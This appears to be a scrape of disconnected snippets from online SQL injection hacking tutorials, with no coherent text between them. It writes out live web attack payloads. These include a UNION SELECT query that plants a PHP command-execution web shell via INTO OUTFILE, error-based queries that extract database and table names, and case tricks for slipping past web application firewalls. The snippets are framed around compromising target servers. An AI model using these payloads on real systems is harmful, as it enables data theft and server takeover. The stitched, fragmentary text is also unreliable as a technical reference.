Inject.us

[...] or higher-case keywords. We can easily evade that kind of wafs by using alternate case. if union select is forbidden , we can always try UNION SELECT instead. And if both does not work, We can try [...]

[...] . <?php system($_REQUEST['cmd'])?> our query be like: http://website.com/file.php?id=1 union select 1,"<?php system($_REQUEST['cmd'])?>",3,4 INTO OUTFILE " /var/www/website/ [...]

[...] value of given type Syntax of cast() Cast(Expression AS type) http://website.com/page.php?id=1 union select 1,2,cast(@@version as binary)# Bypass illegal mix of collations with AES_Encrypt() and [...]

[...] To extract first table from current database  or 1 group by  concat_ws( 0x3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand( [...]

[...] one thing, MySQL is case insensitive i.e SELECT and select are same example SQL command Code: SELECT column1, column2 from table_name this will be used to fetch records of column1 and column2 from [...]

[...] +table_name+not+in('table1','table2')))--  Fiding Column names okay so now we have our table names but we dont know how to find column names in those tables? lets say we want to find columns of [...]

[...] ) from information_schema.schemata limit 1,1),floor(rand(0)*2)) having min(0) or 1# Finding Table names using Error based Injection To extract first table from current database  or 1 group by & [...]

[...] different collations / character sets in a select statement. What else you can use to bypass illegal mix of collation / character sets? Well, you can solve this error by changing the default [...]

[...]  Fetching row entries from any column of any table.  Applying Stacked Quires on target application with SQLi Bug.  Uploading your payload on Target Application   Executing [...]

[...] Assalamualaikum. During testing SQL Injection Vulnerability in our target application We always Try to find vulnerability in GET or POST parameters. But we don't really care [...]

[...] try and compromise the target machine  with this SQLi Quires . How can we get shell on target application without admin panel? Yes you can hack that server with SQLi Quires and a payload or php [...]

[...] will be extracting MySQL Version Information. We will be Extracting Database Names in our Target Application. We will be Getting Table_Names in a particular Database. We will be extracting [...]

[...] WAF? WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections and Cross Site Scripting (XSS) attacks. How does it Work? When WAF detects any malicious [...]

[...] to Database Management Systems to trigger Injections. We have already covered on Basics of SQL Injections with UNION Technique. You can check my POST here http://www.madleets.com/Thread-sql-injection- [...]